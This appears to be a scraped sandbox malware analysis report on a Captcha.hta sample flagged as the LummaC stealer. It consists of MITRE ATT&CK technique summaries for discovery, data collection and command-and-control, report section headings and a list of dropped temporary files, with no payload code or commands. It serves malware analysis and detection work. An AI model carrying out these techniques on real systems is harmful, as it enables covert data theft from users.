Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Captcha.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\RESEA2B.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ox3fkw3.xai.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmp4lrp5.lef.ps1

C:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline

C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll

Windows Analysis Report
Captcha.hta

Function 004361E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 636
memorycomCOMMON

Function 0042B4FC Relevance: 12.8, APIs: 3, Strings: 4, Instructions: 519
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre